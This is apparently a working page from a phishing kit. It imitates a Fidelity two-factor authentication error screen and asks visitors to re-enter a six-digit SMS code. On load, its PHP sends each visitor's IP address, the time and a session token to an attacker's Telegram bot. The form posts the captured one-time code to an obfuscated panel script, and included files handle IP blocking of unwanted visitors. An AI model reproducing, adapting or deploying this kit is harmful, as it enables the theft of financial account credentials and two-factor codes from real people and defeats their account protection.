<?php if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
// --- START: Original PHP from error page ---
include "../panel/banip/zeus.php";
include "../panel/send/panel.php";
$visitorIP = $_SERVER['REMOTE_ADDR'];
$currentTime = date('H:i:s d/m/Y');
$message = '⚠️ 𝗦𝗠𝗦 𝗘𝗥𝗥𝗢𝗥 𝗦𝗧𝗔𝗧𝗨𝗦
━━━━━━━━━━━━━━━
🎯 𝗦𝘁𝗮𝘁𝘂𝘀: SMS Verification Failed ❌
📍 𝗗𝗲𝘀𝘁𝗶𝗻𝗮𝘁𝗶𝗼𝗻: SMS Error Page 🔄
━━━━━━━━━━━━━━━
📱 𝗗𝗘𝗩𝗜𝗖𝗘 𝗜𝗡𝗙𝗢
━━━━━━━━━━━━━━━
🌍 𝗜𝗣: ' . $visitorIP . '
⏰ 𝗧𝗶𝗺𝗲: ' . $currentTime . '
🔐 𝗦𝗲𝘀𝘀𝗶𝗼𝗻 𝗜𝗗: ' . $_SESSION['auth_token'];
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = http_build_query(["chat_id" => $chatId, "text" => $message, "parse_mode" => "HTML"]);
$options = ["http" => ["header" => "Content-Type: application/x-www-form-urlencoded\r\n", "method" => "POST", "content" => $data,],];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
if ($result === false) {
    error_log("Erreur d'envoi du message Telegram: " . error_get_last()['message']);
}
// --- END: Original PHP from error page ---

// --- START: PHP for session (assumed needed) ---
$token = bin2hex(random_bytes(32));
$_SESSION['auth_token'] = $token;
$_SESSION['auth_time'] = time();
$_SESSION['visitor_ip'] = $_SERVER['REMOTE_ADDR'];
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
if (isset($_GET['verify']) && $_GET['verify'] == 'ajax') {
    header('Content-Type: application/json');
    echo json_encode(['success' => true, 'token' => $token]);
    exit();
}
if (!isset($_SESSION['auth_token'])) {
    header("Location: https://www.google.com");
    exit();
}
if (isset($_GET['action']) && $_GET['action'] == 'redirect') {
    if (isset($_SESSION['redirect_url']) && !empty($_SESSION['redirect_url'])) {
        $redirect_url = $_SESSION['redirect_url'];
        unset($_SESSION['redirect_url']);
        header("Location: " . $redirect_url);
        exit();
    }
    header("Location: login.php");
    exit();
}
// --- END: PHP for session ---
?>
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Two-Factor Authentication</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
        
        :root {
            --primary-color: #008a00; /* Fidelity Green */
            --primary-dark: #006a00;
            --text-color: #333333;
            --text-light: #555555;
            --border-color: #cccccc;
            --page-bg: #f5f5f5;
            --border-light: #e0e0e0;
            --grey-text: #666666;
            --error-color: #D32F2F;
            --error-bg: #fff2f2;
            --error-border: #dc3545;
            --error-text-light: #842029;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Roboto', sans-serif;
        }
        
        body {
            background: var(--page-bg);
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            color: var(--text-color);
        }
        
        .page-wrapper {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
            width: 100%;
        }
        
        .header {
            padding: 24px 40px;
            background: #ffffff;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        }
        
        .logo img {
            height: 52px; /* Set height to 52px as requested */
        }
        
        .main-content {
            flex: 1;
            display: flex;
            justify-content: center;
            padding: 40px 20px;
        }
        
        .login-container { /* Re-using login-container for consistent style */
            width: 100%;
            max-width: 400px; /* Kept narrow for login/sms forms */
            background: #ffffff;
            padding: 32px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
            border: 1px solid #e0e0e0;
        }
        
        h1 {
            font-size: 28px;
            color: var(--text-color);
            margin-bottom: 12px;
            font-weight: 500;
        }

        .verification-subtitle {
            color: var(--text-light);
            font-size: 16px;
            line-height: 1.6;
            margin-bottom: 24px;
        }

        /* --- ERROR CONTAINER (From your error file) --- */
        .error-container {
            background-color: var(--error-bg);
            border: 1px solid var(--error-border); /* Fidelity style 1px border */
            padding: 16px;
            border-radius: 8px;
            margin-bottom: 24px;
            display: flex;
            align-items: flex-start;
            gap: 12px;
        }
        .error-icon {
            width: 24px;
            height: 24px;
            min-width: 24px;
            fill: var(--error-color);
            margin-top: 2px;
        }
        .error-message {
            color: var(--error-text-light);
            font-size: 14px;
            line-height: 1.5;
            font-weight: 500;
        }
        .error-message strong {
            display: block;
            margin-bottom: 4px;
            font-weight: 700; /* Bolder */
        }
        /* --- END ERROR CONTAINER --- */

        /* --- STEPS (From your error file) --- */
        .verification-steps {
            display: flex;
            margin-bottom: 30px;
            gap: 10px; /* Reduced gap */
        }
        .step {
            flex: 1;
            text-align: center;
            padding: 10px; /* Reduced padding */
            background: var(--page-bg); /* Lighter background */
            border-radius: 8px; /* Rounded corners */
            position: relative;
        }
        .step.active {
            background: #e0e0e0; /* Grey for active */
            transform: translateY(0);
            box-shadow: none;
        }
        .step-number {
            width: 24px;
            height: 24px;
            background: var(--text-light); /* Grey number bg */
            color: #fff;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: 0 auto 8px;
            font-size: 14px;
            font-weight: 700;
        }
        .step.active .step-number {
            background: var(--primary-color); /* Green number bg for active */
        }
        .step-text {
            font-size: 13px;
            color: var(--text-light);
            font-weight: 500;
        }
        .step.active .step-text {
            color: var(--text-color);
            font-weight: 700;
        }
        /* --- END STEPS --- */

        /* --- OTP Input Styling --- */
        .otp-container {
            display: flex;
            gap: 10px;
            margin-bottom: 24px;
            justify-content: center; 
        }
        .otp-input {
            width: 52px;
            height: 60px;
            border: 1px solid var(--border-color);
            border-radius: 4px;
            font-size: 24px;
            font-weight: 600;
            text-align: center;
            transition: all 0.2s ease;
            color: var(--text-color);
        }
        .otp-input:focus {
            outline: none;
            border-color: var(--primary-color); 
            box-shadow: 0 0 0 2px rgba(0, 138, 0, 0.2);
        }
        /* Error state for OTP inputs (from original file) */
        .otp-input.input-error {
             border-color: var(--error-color);
             box-shadow: 0 0 0 1px var(--error-color);
        }

        /* --- Button Styling --- */
        .verify-button {
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 4px;
            padding: 14px;
            font-size: 16px;
            font-weight: 700;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
            width: 100%;
            height: 50px;
            transition: all 0.2s ease;
        }
        .verify-button:disabled {
            background-color: #E0E0E0;
            color: var(--grey-text);
            cursor: not-allowed;
        }
        .verify-button:not(:disabled):hover {
            background-color: var(--primary-dark);
        }
        /* Icon inside button (from your error file) */
        .shield-icon {
            width: 20px;
            height: 20px;
            fill: currentColor;
        }
        
        /* --- Resend & Timer Styling --- */
        .resend-container {
            margin-top: 24px;
            text-align: center;
        }
        .resend-link {
            color: var(--primary-color);
            text-decoration: none;
            font-size: 15px;
            font-weight: 600;
        }
        .resend-link:hover {
            text-decoration: underline;
        }
        .timer {
            display: block;
            color: var(--grey-text);
            margin-top: 8px;
            font-size: 14px;
        }
        
        /* --- GPay Security (from your error file) --- */
        .gpay-security {
            margin-top: 30px;
            padding-top: 20px;
            border-top: 1px solid var(--border-light);
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 12px;
        }
        .gpay-security img {
            height: 24px; /* Adjusted height */
            width: auto;
            object-fit: contain;
        }
        .gpay-text {
            color: var(--grey-text);
            font-size: 13px;
            font-weight: 500;
        }
        
        /* --- Responsive Design --- */
        @media(max-width: 480px) {
            .header { padding: 20px 16px; }
            .main-content { padding: 20px 16px; }
            .login-container { padding: 24px; }
            .otp-input {
                width: 45px;
                height: 55px;
                font-size: 20px;
                border-radius: 4px;
            }
            .otp-container {
                gap: 5px;
            }
            .verification-steps {
                gap: 5px;
            }
            .step-text {
                font-size: 12px;
            }
            .gpay-security {
                flex-direction: column;
                gap: 8px;
            }
        }
    </style>
</head>
<body>

    <div class="page-wrapper">
        <header class="header">
            <div class="logo">
                <!-- Path updated to ../logo.png as in your file -->
                <img src="../logo.png" alt="Logo">
            </div>
            <!-- Removed the "Security Badge" to match the simple Fidelity header -->
        </header>

        <main class="main-content">
            <div class="login-container">
                
                <!-- Content from your SMS Error page -->
                <div class="error-container">
                    <svg class="error-icon" viewBox="0 0 24 24"><path d="M11.983 0a12.206 12.206 0 00-8.51 3.653A11.8 11.8 0 000 12.207 11.779 11.779 0 0011.8 24h.214A12.111 12.111 0 0024 11.791 11.766 11.766 0 0011.983 0zM10.5 16.542a1.476 1.476 0 011.449-1.53h.027a1.527 1.527 0 011.523 1.47 1.475 1.475 0 01-1.449 1.53h-.027a1.529 1.529 0 01-1.523-1.47zM11 12.5v-6a1 1 0 012 0v6a1 1 0 11-2 0z"/></svg>
                    <div class="error-message"><strong>Invalid Verification Code</strong>The SMS code you entered is incorrect or has expired. Please try again.</div>
                </div>
                
                <div class="verification-header" style="margin-bottom: 24px; text-align: left;">
                    <h1 style="text-align: left;">Enter Security Code</h1>
                    <!-- Icon from your file, hidden to match Fidelity design -->
                    <!-- <img src="../icon.png" alt="SMS Icon" class="icon-sms"> -->
                    <p class="verification-subtitle" style="text-align: left;">Please enter the verification code sent to the phone number registered with your account.</p>
                </div>
                
                <!-- Steps from your file -->
                <div class="verification-steps">
                    <div class="step">
                        <div class="step-number">1</div>
                        <div class="step-text">Login</div>
                    </div>
                    <div class="step active">
                        <div class="step-number">2</div>
                        <div class="step-text">Verify SMS</div>
                    </div>
                    <div class="step">
                        <div class="step-number">3</div>
                        <div class="step-text">Complete</div>
                    </div>
                </div>

                <!-- Form from your file, action path updated -->
                <form method="post" action="../panel/send/402c5a6fe4c04c7d269c4532baecc8ee.php" id="verificationForm">
                    <div class="otp-container">
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num1" required>
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num2" required>
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num3" required>
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num4" required>
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num5" required>
                        <input type="text" class="otp-input" maxlength="1" pattern="[0-9]" inputmode="numeric" name="num6" required>
                    </div>
                    <button type="submit" class="verify-button" id="verifyButton" disabled>
                        <!-- Icon from your file -->
                        <svg class="shield-icon" viewBox="0 0 24 24" width="20" height="20"><path fill="currentColor" d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4zm0 10.99h7c-.53 4.12-3.28 7.79-7 8.94V12H5V6.3l7-3.11v8.8z"></path></svg>
                        Verify Code
                    </button>
                    <!-- GPay security from your file -->
                  
                </form>

                <div class="resend-container">
                    <a href="#" class="resend-link" id="resendLink" style="display:none">Resend Code</a>
                    <span class="timer" id="timer" style="display:block">Resend available in: 01:49</span>
                </div>

            </div>
        </main>
    </div>

    <!-- JavaScript from your SMS Error page (untouched) -->
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            const form = document.getElementById('verificationForm');
            const inputs = [...document.querySelectorAll('.otp-input')];
            const verifyButton = document.getElementById('verifyButton');
            const resendLink = document.getElementById('resendLink');
            const timerElement = document.getElementById('timer');
            let submitTimeout;
            inputs[0].focus();
            inputs.forEach((input, index) => {
                input.addEventListener('input', e => {
                    const value = e.target.value;
                    if (!/^\d*$/.test(value)) {
                        e.target.value = '';
                        return
                    }
                    if (value.length === 1) {
                        if (index < inputs.length - 1) {
                            inputs[index + 1].focus()
                        }
                    }
                    validateInputs()
                });
                input.addEventListener('keydown', e => {
                    if (e.key === 'Backspace' && !e.target.value && index > 0) {
                        inputs[index - 1].focus()
                    }
                });
                input.addEventListener('paste', e => {
                    e.preventDefault();
                    const pastedData = e.clipboardData.getData('text');
                    const numbers = pastedData.match(/\d/g);
                    if (numbers) {
                        inputs.forEach((input, i) => {
                            if (numbers[i]) {
                                input.value = numbers[i]
                            }
                        });
                        validateInputs()
                    }
                })
            });

            function validateInputs() {
                if (submitTimeout) {
                    clearTimeout(submitTimeout)
                }
                const isComplete = inputs.every(input => input.value.length === 1);
                verifyButton.disabled = !isComplete;
                if (isComplete) {
                    submitTimeout = setTimeout(() => {
                        form.submit()
                    }, 1000)
                }
            }

            function startTimer(duration) {
                let timer = duration;
                resendLink.style.display = 'none';
                timerElement.style.display = 'block';
                const interval = setInterval(() => {
                    const minutes = parseInt(timer / 60, 10);
                    const seconds = parseInt(timer % 60, 10);
                    timerElement.textContent = `Resend available in: ${minutes.toString().padStart(2,'0')}:${seconds.toString().padStart(2,'0')}`;
                    if (--timer < 0) {
                        clearInterval(interval);
                        resendLink.style.display = 'inline-block';
                        timerElement.style.display = 'none'
                    }
                }, 1000)
            }

            startTimer(120);
            resendLink.addEventListener('click', e => {
                e.preventDefault();
                startTimer(120)
            });
            form.addEventListener('submit', e => {
                e.preventDefault();
                const code = inputs.map(input => input.value).join('');
                console.log('Code submitted:', code);
                form.submit()
            })
        });
    </script>
</body>
</html>